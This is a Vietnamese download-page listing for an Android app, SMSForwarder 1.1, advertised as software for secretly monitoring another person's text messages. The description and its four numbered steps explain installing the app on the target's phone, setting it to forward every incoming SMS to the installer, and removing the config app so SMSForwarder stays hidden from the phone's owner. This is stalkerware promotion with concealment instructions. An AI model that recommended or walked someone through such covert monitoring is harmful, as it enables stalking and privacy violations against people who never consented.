SMSForwarder for Android 1.1 Phần mềm theo dõi SMS người khác

Tải về
 • Đánh giá:
  3 374 👨
 • Phát hành:
 • Version: 1.1
 • Sử dụng: Miễn phí
 • Dung lượng: 37 KB
 • Lượt xem: 2.727
 • Lượt tải: 60.815
 • Ngày cập nhật:
 • Yêu cầu: Android 2.1 and up
Giới thiệu

SMSForwarder for Android - Phần mềm theo dõi SMS người khác

SMSForwarder bí mật chuyển tất cả các tin nhắn văn bản (SMS) từ điện thoại khác vào điện thoại của bạn (hoặc bất kỳ điện thoại mà bạn chọn). Bạn chỉ cần cài phần mềm này vào máy người nào mà bạn muốn theo dõi, điền số điên thoại của bạn vào, và khi một ai đó nhắn tin tới cho người này tin nhắn đó sẽ lập tức được gửi cho bạn. SMSForwarder luôn luôn ẩn nên người khác sẽ không phát hiện được.

SMSForwarder dễ dàng:

1. Cài đặt SMSForwarder (dùng thử hoặc Pro) trên điện thoại bạn muốn theo dõi
2. Cài đặt SMSForwarder Config trên cùng một điện thoại
3. Chạy SMSForwarder Config để thiết lập bí danh của điện thoại này để gửi tất cả các tin nhắn SMS
4. Gỡ bỏ SMSForwarder Config để ẩn SMSForwarder từ trình đơn ứng dụng

SMSForwarder for Android

Phương Lan

Liên kết tải về